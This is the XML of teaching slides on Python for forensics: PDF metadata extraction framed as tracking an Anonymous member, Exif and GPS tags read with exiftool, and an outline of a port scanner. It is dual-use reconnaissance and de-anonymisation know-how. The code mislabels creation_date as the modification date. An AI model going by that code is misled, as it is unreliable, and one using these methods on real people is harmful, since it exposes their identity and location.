          <p:cNvPr id="996" name="Google Shape;996;p33"/>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342900" lvl="0" marL="346711" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>This technique using a Python script is used to track a member of the hacker group Anonymous by analyzing a pdf document. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="346711" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>To use the script, the user needs to download a pdf document. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="346711" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>As an example, the user downloads a document from Wired.com named ANONOPS_The_Press_Release.pdf PyPDF is an excellent third-party utility for managing PDF documents, it is available for download from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://pypi.org/project/pypdf/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> .</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="346711" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> This library provides various services based on PDF documents, such as extracting metadata. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="346711" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>The method .getDocumentInfo() is used to extract the metadata, which results in an array of tuples. </a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="997" name="Google Shape;997;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">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3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a:t>Usage of pyPDF to parse PDF Metadata</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003" name="Google Shape;1003;p34"/>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342900" lvl="0" marL="346711" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Each tuple contains the description of a metadata element and its value. After successfully iterating through the array, the user can receive the entire metadata of the PDF document. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="346711" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>An option parser can be added to the script to identify the specific file. Similarly, the script can be modified to a certain extent so that it can receive specific metadata. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="346711" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>It's worth noting that the script should be used in compliance with the website's policy and terms of service, and the usage of such script in illegal activities is not encouraged.</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1004" name="Google Shape;1004;p34"/>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3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Understanding  Exif Metadata</a:t>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1010" name="Google Shape;1010;p35"/>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342900" lvl="0" marL="363220" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Exif stands for Exchangeable Image File Format, which is a standard that defines how images and audio files are stored. The Exif standard includes useful tags that can be used for forensic investigations. </a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1011" name="Google Shape;1011;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="680320" y="4649919"/>
            <a:ext cx="10146034" cy="1878720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1012" name="Google Shape;1012;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">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3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a:t>Usage of pyPDF to parse PDF Metadata</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1018" name="Google Shape;1018;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="235670" y="2336873"/>
            <a:ext cx="11745797" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="346711" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>One of the tools that can be used to parse these Exif tags is exiftool, which is a command-line tool created by Phil Harvey. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="346711" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Exiftool is available for download on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.sno.phy.queensu.ca/~phil/exiftool/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="346711" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>The Exif tags that can be extracted by exiftool include information such as the camera model name and GPS location, including longitude and latitude.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="346711" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> Exiftool can be used to extract Exif data from a wide range of file formats including images, audio and video files. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="346711" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>It is worth noting that the accuracy and availability of location information may vary depending on the device and the way the image was taken.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="346711" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Also,it is important to keep in mind that usage of this script should be in compliance with the website's policy and terms of service.</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1019" name="Google Shape;1019;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">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e9adf94182_2_61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="140196" y="8596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BUILDING A PORT SCANNER</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="276" name="Google Shape;276;g1e9adf94182_2_61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="288953" y="2888489"/>
            <a:ext cx="10490400" cy="35994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1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This passage describes the process of setting up a program that accepts a hostname and port from a user as input. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The program uses the argparse library to parse command line options. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The call to argparse.ArgumentParser() creates an instance of an argument parser.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> Next, parser.add_argument specifies the individual command line options for our script, like hostname and port. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The script will also include two functions, connScan and portScan, which will be used to perform the actual scanning of the host and port.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="277" name="Google Shape;277;g1e9adf94182_2_61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="707011" y="2310639"/>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g2073b6da4c1_0_8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a:t>Contd..</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1025" name="Google Shape;1025;g2073b6da4c1_0_87"/>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
        <p:nvSpPr>
          <p:cNvPr id="1026" name="Google Shape;1026;g2073b6da4c1_0_87"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="477300" y="2262525"/>
            <a:ext cx="10697400" cy="4386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i="1" lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>import</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os</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="E5C07B"/>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i="1" lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>import</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argparse</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="E5C07B"/>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i="1" lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>import</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PyPDF2</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="E5C07B"/>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i="1" lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>import</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docx</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="E5C07B"/>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C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>def</a:t>
            </a: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get_pdf_metadata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>file_path</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try</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with</a:t>
            </a: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open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>file_path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"rb"</a:t>
            </a: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as</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pdf_file</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pdf</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PyPDF2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="E5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>PdfReader</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pdf_file</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info</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pdf</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metadata</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="E06C75"/>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"Title:"</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info</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title</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"Author:"</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info</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author</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"Subject:"</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info</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subject</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g2073b6da4c1_0_7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a:t>Contd..</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1032" name="Google Shape;1032;g2073b6da4c1_0_79"/>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
        <p:nvSpPr>
          <p:cNvPr id="1033" name="Google Shape;1033;g2073b6da4c1_0_79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="477300" y="2262525"/>
            <a:ext cx="10697400" cy="4386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"Created In:"</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info</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creator</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"Creation Date:"</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info</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creation_date</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"Modification Date:"</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info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>creation_date</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except</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Exception</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
